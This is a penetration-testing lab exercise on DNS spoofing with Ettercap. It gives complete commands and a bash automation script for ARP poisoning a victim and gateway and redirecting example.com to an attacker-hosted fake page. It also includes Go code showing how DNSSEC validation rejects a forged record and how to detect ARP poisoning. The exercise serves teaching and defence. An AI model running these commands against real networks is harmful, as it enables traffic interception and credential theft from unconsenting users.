Exercise 9: DNS Spoofing with Ettercap

Jan 9, 2025

Objective

Simulate a DNS spoofing attack using Ettercap to redirect traffic from a legitimate website to a malicious server and understand how DNSSEC can mitigate such attacks.

Scenario

You are a penetration tester assessing the security of a local network. One of the potential threats in unsecured networks is DNS spoofing, where an attacker redirects users from legitimate websites to malicious ones. In this exercise, you will use Ettercap to perform a DNS spoofing attack in a controlled lab environment and observe how DNSSEC can prevent such attacks.

⚠️ Important: This exercise must only be conducted in a legal and controlled environment. Unauthorized DNS spoofing is illegal and unethical.


Lab Instructions

Step 1: Set Up the Lab Environment

  • Attacker Machine: Linux system with Ettercap installed.
  • Victim Machine: A device on the same network.
  • Malicious Server: A simple web server serving a fake page.

Step 2: Install Ettercap

On the Attacker Machine, install Ettercap:

sudo apt update 
sudo apt install ettercap-graphical -y

Run Ettercap with root privileges:

sudo ettercap -G

Step 3: Configure the Malicious Web Server

On the Attacker Machine, set up a simple fake website:

sudo apt install apache2 -y 
echo "<h1>Fake Example.com</h1>" | sudo tee /var/www/html/index.html 
sudo systemctl start apache2

Step 4: Edit the DNS Spoof Configuration

Open Ettercap’s DNS spoof configuration file:

sudo nano /etc/ettercap/etter.dns

Add the following lines to redirect example.com and all of its subdomains to the attacker’s IP:

example.com A <attacker-ip> 
*.example.com A <attacker-ip>

Replace <attacker-ip> with the IP address of the attacker machine.

Step 5: Launch the DNS Spoofing Attack

Enable IP forwarding:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Start Ettercap in graphical mode, then:

  • Go to Sniff > Unified sniffing and select the correct network interface.
  • Add the victim and the gateway to the target list.
  • Navigate to Mitm > ARP poisoning and enable it for both directions.
  • Go to Plugins > Manage the plugins and enable dns_spoof.

Step 6: Test the Redirection

On the Victim Machine, open a browser and visit:

http://example.com

The victim should be redirected to the fake web page hosted on the attacker’s machine.


Solution & Explanation

How DNS Spoofing Works

  • The attacker poisons the ARP cache of the victim and the gateway, positioning themselves as a man-in-the-middle.
  • DNS requests for example.com are intercepted and spoofed to resolve to the attacker’s IP.
  • The victim unknowingly accesses the malicious web server.

Result

  • Victim traffic meant for example.com is redirected to a fake page.
  • This simulates how attackers can steal credentials or deliver malware.

Mitigation with DNSSEC

What is DNSSEC?

  • DNS Security Extensions (DNSSEC) adds cryptographic signatures to DNS data to ensure its authenticity.

How DNSSEC Prevents DNS Spoofing

  1. Digital Signatures: DNS records are signed with a private key, and resolvers verify them with the public key.
  2. Data Integrity: Unauthorized modifications to DNS data are detectable.
  3. Authentication: Prevents redirection to malicious servers by ensuring data comes from a verified source.
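To make the three points above concrete, here is an added illustration (not code from the original exercise or from any DNSSEC implementation) of what a zone signer and a validating resolver do with a single A record. It uses Ed25519, which DNSSEC assigns algorithm number 15, and builds the signed data the way RFC 4034 describes: the RRSIG RDATA (minus the signature field) followed by the canonical wire form of the RRset. The RRSIG layout is simplified (no inception/expiration times or key tag), the RRset holds one record, and there is no chain of trust up to the root; the function names (SignRRset, ValidateRRset, Demo) and both addresses (203.0.113.10 as the genuine answer, 192.168.1.50 standing in for <attacker-ip>) are constructed for this example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"fmt"
	"net"
	"strings"
)

// DNSSEC algorithm number for Ed25519 (RFC 8080).
const algEd25519 = 15

// wireName encodes an owner name in DNS wire format, lowercased as the
// DNSSEC canonical form requires (RFC 4034 section 6.2).
func wireName(name string) []byte {
	var b []byte
	for _, label := range strings.Split(strings.TrimSuffix(strings.ToLower(name), "."), ".") {
		b = append(b, byte(len(label)))
		b = append(b, label...)
	}
	return append(b, 0)
}

// ARecord holds the fields of an A RR that a spoofed answer would change.
type ARecord struct {
	Owner string
	TTL   uint32
	IP    net.IP
}

// canonicalRR serialises one A RR in canonical wire form:
// owner, TYPE (A=1), CLASS (IN=1), original TTL, RDLENGTH, RDATA.
func canonicalRR(rr ARecord) []byte {
	var b bytes.Buffer
	b.Write(wireName(rr.Owner))
	binary.Write(&b, binary.BigEndian, uint16(1)) // TYPE A
	binary.Write(&b, binary.BigEndian, uint16(1)) // CLASS IN
	binary.Write(&b, binary.BigEndian, rr.TTL)
	ip4 := rr.IP.To4()
	binary.Write(&b, binary.BigEndian, uint16(len(ip4)))
	b.Write(ip4)
	return b.Bytes()
}

// RRSIGMeta is the RRSIG RDATA that precedes the signature field. Real RRSIGs
// also carry expiration, inception and a key tag; this illustration omits them.
type RRSIGMeta struct {
	TypeCovered uint16
	Algorithm   uint8
	Labels      uint8
	OrigTTL     uint32
	SignerName  string
}

func (m RRSIGMeta) rdataPrefix() []byte {
	var b bytes.Buffer
	binary.Write(&b, binary.BigEndian, m.TypeCovered)
	b.WriteByte(m.Algorithm)
	b.WriteByte(m.Labels)
	binary.Write(&b, binary.BigEndian, m.OrigTTL)
	b.Write(wireName(m.SignerName))
	return b.Bytes()
}

// signedData is what the zone signer signs: RRSIG RDATA prefix + canonical RRset.
func signedData(meta RRSIGMeta, rr ARecord) []byte {
	return append(meta.rdataPrefix(), canonicalRR(rr)...)
}

// SignRRset is the zone owner's step: produce the RRSIG signature bytes with the zone's private key.
func SignRRset(priv ed25519.PrivateKey, meta RRSIGMeta, rr ARecord) []byte {
	return ed25519.Sign(priv, signedData(meta, rr))
}

// ValidateRRset is the validating resolver's step: rebuild the signed data from
// the answer it received and verify it with the zone's public key (the DNSKEY).
// Any change to the owner, TTL or address makes verification fail.
func ValidateRRset(pub ed25519.PublicKey, meta RRSIGMeta, rr ARecord, sig []byte) bool {
	return ed25519.Verify(pub, signedData(meta, rr), sig)
}

// Demo signs the genuine record, then validates both the genuine answer and a
// spoofed copy carrying the attacker's address. Returns (genuineOK, spoofedOK).
func Demo() (bool, bool) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	meta := RRSIGMeta{TypeCovered: 1, Algorithm: algEd25519, Labels: 2, OrigTTL: 3600, SignerName: "example.com."}
	genuine := ARecord{Owner: "example.com.", TTL: 3600, IP: net.ParseIP("203.0.113.10")} // constructed address
	sig := SignRRset(priv, meta, genuine)

	spoofed := genuine
	spoofed.IP = net.ParseIP("192.168.1.50") // constructed stand-in for <attacker-ip>
	return ValidateRRset(pub, meta, genuine, sig), ValidateRRset(pub, meta, spoofed, sig)
}

func main() {
	ok, forged := Demo()
	fmt.Printf("genuine answer validates: %v\nspoofed answer validates: %v\n", ok, forged)
}
```

The spoofed answer fails because the attacker can rewrite the A record but cannot produce an RRSIG for it without the zone's private key. One caveat worth keeping in mind for this lab: the signature is checked by whichever resolver validates. If the victim's stub resolver simply trusts the answer it gets from the LAN resolver, and the attacker sits between the two, a forged reply still reaches the client; validation on the client (or an authenticated path to a validating resolver) is what closes that gap. On a validating resolver, `dig +dnssec example.com` shows the `ad` flag in the header when the answer was verified.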

Limitations of DNSSEC

  • Complexity: Implementation can be complex and resource-intensive.
  • Partial Adoption: Not all domains and resolvers support DNSSEC.

Testing & Verification

  • Verify the fake site loads when visiting example.com on the victim machine.
  • Disable the Ettercap attack and confirm the victim can access the legitimate example.com.
  • Analyze ARP tables and DNS responses to understand the redirection.
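The last verification step (analysing ARP tables and DNS answers) can be turned into a repeatable check. The following Go program is an added example, not part of the original exercise: it parses the output of `ip neigh show` on the victim, flags any MAC address claimed by more than one IP (the signature of the ARP poisoning described under "How DNS Spoofing Works", where the attacker's MAC appears against the gateway IP), compares the gateway's MAC with a baseline recorded before the test, and flags a public name resolving to a private address, which is exactly what the lab's etter.dns entry produces. The sample neighbour table, the gateway/attacker addresses (192.168.1.1, 192.168.1.50) and the baseline MAC are constructed for the example; the function names are this example's own.

```go
package main

import (
	"fmt"
	"net"
	"sort"
	"strings"
)

// Neighbor is one IP-to-MAC entry of the victim's neighbour (ARP) table.
type Neighbor struct {
	IP  string
	MAC string
}

// ParseIPNeigh parses `ip neigh show` output (Linux). A line looks like:
//   192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
// Entries without an lladdr (FAILED/INCOMPLETE) are skipped.
func ParseIPNeigh(out string) []Neighbor {
	var res []Neighbor
	for _, line := range strings.Split(out, "\n") {
		f := strings.Fields(line)
		if len(f) == 0 {
			continue
		}
		for i := 0; i+1 < len(f); i++ {
			if f[i] == "lladdr" {
				res = append(res, Neighbor{IP: f[0], MAC: strings.ToLower(f[i+1])})
				break
			}
		}
	}
	return res
}

// DuplicateMACs returns, for each MAC claimed by more than one IP, the sorted
// list of IPs mapped to it. During ARP poisoning the gateway IP and the
// attacker's own IP collide on the attacker's hardware address.
func DuplicateMACs(n []Neighbor) map[string][]string {
	byMAC := map[string][]string{}
	for _, e := range n {
		byMAC[e.MAC] = append(byMAC[e.MAC], e.IP)
	}
	dup := map[string][]string{}
	for mac, ips := range byMAC {
		if len(ips) > 1 {
			sort.Strings(ips)
			dup[mac] = ips
		}
	}
	return dup
}

// GatewayMACChanged reports whether the gateway's current MAC differs from a
// known-good value recorded before the test (a simple static-ARP style check).
func GatewayMACChanged(n []Neighbor, gatewayIP, knownMAC string) bool {
	for _, e := range n {
		if e.IP == gatewayIP {
			return e.MAC != strings.ToLower(knownMAC)
		}
	}
	return false
}

// PrivateAnswer flags an A answer for a public name that resolves to a private
// (RFC 1918), link-local or loopback address, as the spoofed etter.dns entry does.
func PrivateAnswer(ip string) bool {
	p := net.ParseIP(ip)
	return p != nil && (p.IsPrivate() || p.IsLinkLocalUnicast() || p.IsLoopback())
}

// Constructed `ip neigh show` output from the victim while the attack runs
// (not captured from a real host): gateway and attacker share one MAC.
const sampleNeigh = `192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.168.1.20 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.99 dev eth0  FAILED`

func main() {
	n := ParseIPNeigh(sampleNeigh)
	for mac, ips := range DuplicateMACs(n) {
		fmt.Printf("ALERT: MAC %s is claimed by %d IPs %v (possible ARP poisoning)\n", mac, len(ips), ips)
	}
	if GatewayMACChanged(n, "192.168.1.1", "de:ad:be:ef:00:01") { // constructed baseline MAC
		fmt.Println("ALERT: gateway MAC differs from the recorded baseline")
	}
	if PrivateAnswer("192.168.1.50") {
		fmt.Println("ALERT: public name example.com resolved to a private address")
	}
}
```

Run it with the real `ip neigh show` output piped in place of the constant and with the gateway MAC recorded before Step 5; after the attack is disabled, the duplicate-MAC alert should disappear and the gateway entry should match the baseline again.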

Additional Script (Optional)

Automate the DNS spoofing setup:

#!/bin/bash
# Lab automation: fill in the placeholders before running.
IFACE="eth0"                                     # interface facing the lab network
VICTIM_IP="<victim-ip>"
GATEWAY_IP="<gateway-ip>"
ATTACKER_IP="$(hostname -I | awk '{print $1}')"  # first local address; single quotes keep $1 for awk

# Enable IP forwarding so the victim keeps connectivity while traffic passes through the attacker
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# Configure DNS spoofing (same entries as Step 4)
echo "example.com A ${ATTACKER_IP}" | sudo tee -a /etc/ettercap/etter.dns
echo "*.example.com A ${ATTACKER_IP}" | sudo tee -a /etc/ettercap/etter.dns

# Start Ettercap in text mode with ARP poisoning between victim and gateway and the dns_spoof plugin
sudo ettercap -T -q -i "${IFACE}" -M arp:remote "/${VICTIM_IP}/" "/${GATEWAY_IP}/" -P dns_spoof

Conclusion

In this exercise, you successfully simulated a DNS spoofing attack using Ettercap and redirected traffic to a fake site. You also explored how DNSSEC can prevent such attacks by ensuring the authenticity and integrity of DNS data. Understanding these attack methods and their defenses is crucial for protecting network infrastructure.